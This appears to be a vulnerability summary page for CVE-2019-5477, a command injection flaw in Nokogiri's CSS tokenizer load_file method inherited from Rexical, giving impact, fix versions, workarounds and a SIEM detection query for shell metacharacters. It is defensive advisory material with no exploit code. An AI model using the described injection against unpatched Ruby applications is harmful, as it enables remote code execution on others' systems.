CVE-2019-5477
📋 TL;DR
CVE-2019-5477 is a command injection vulnerability in Nokogiri v1.10.3 and earlier that allows remote code execution via unsafe user input passed to the undocumented `Nokogiri::CSS::Tokenizer#load_file` method. This affects Ruby applications using vulnerable Nokogiri versions to parse CSS with untrusted input. The vulnerability originates from Rexical gem v1.0.6 and earlier, which Nokogiri uses for CSS parsing.
💻 Affected Systems
- Nokogiri
- Rexical
📦 What is this software?
Nokogiri by Nokogiri
Ubuntu Linux by Canonical
Ubuntu Linux by Canonical
Ubuntu Linux by Canonical
Ubuntu Linux by Canonical
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise with attacker gaining shell access and executing arbitrary commands as the application user.
Likely Case
Remote code execution leading to data theft, privilege escalation, or lateral movement within the environment.
If Mitigated
Limited impact if proper input validation and sandboxing prevent command injection attempts.
🎯 Exploit Status
Exploitation requires specific application code patterns but is straightforward once those conditions are met.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Nokogiri v1.10.4+, Rexical v1.0.7+
Vendor Advisory: https://github.com/sparklemotion/nokogiri/issues/1915
Restart Required: Yes
Instructions:
1. Update Nokogiri gem: `gem update nokogiri` 2. Verify version: `gem list nokogiri` shows v1.10.4 or higher 3. Restart application services
🔧 Temporary Workarounds
Input Validation
allValidate and sanitize all user input before passing to Nokogiri CSS parsing functions
Avoid load_file Method
allDo not use the undocumented Nokogiri::CSS::Tokenizer#load_file method with user-controlled input
🧯 If You Can't Patch
- Implement strict input validation and sanitization for all CSS parsing inputs
- Run application with minimal privileges and in isolated containers to limit impact
🔍 How to Verify
Check if Vulnerable:
Check Nokogiri version: `gem list | grep nokogiri` - versions <=1.10.3 are vulnerableCheck Version:
gem list | grep nokogiriVerify Fix Applied:
Confirm Nokogiri version >=1.10.4: `gem list | grep nokogiri`📡 Detection & Monitoring
Log Indicators:
- Unusual subprocess executions from Ruby application
- Failed command injection attempts in application logs
Network Indicators:
- Outbound connections from application to unexpected destinations
SIEM Query:
process.name:ruby AND cmdline:*load_file* AND cmdline:*|* OR cmdline:*;* OR cmdline:*`*🔗 References
- https://github.com/sparklemotion/nokogiri/issues/1915
- https://github.com/tenderlove/rexical/blob/master/CHANGELOG.rdoc
- https://hackerone.com/reports/650835
- https://lists.debian.org/debian-lts-announce/2019/09/msg00027.html
- https://lists.debian.org/debian-lts-announce/2022/10/msg00018.html
- https://lists.debian.org/debian-lts-announce/2022/10/msg00019.html
- https://security.gentoo.org/glsa/202006-05
- https://usn.ubuntu.com/4175-1/
- https://github.com/sparklemotion/nokogiri/issues/1915
- https://github.com/tenderlove/rexical/blob/master/CHANGELOG.rdoc
- https://hackerone.com/reports/650835
- https://lists.debian.org/debian-lts-announce/2019/09/msg00027.html
- https://lists.debian.org/debian-lts-announce/2022/10/msg00018.html
- https://lists.debian.org/debian-lts-announce/2022/10/msg00019.html
- https://security.gentoo.org/glsa/202006-05
- https://usn.ubuntu.com/4175-1/
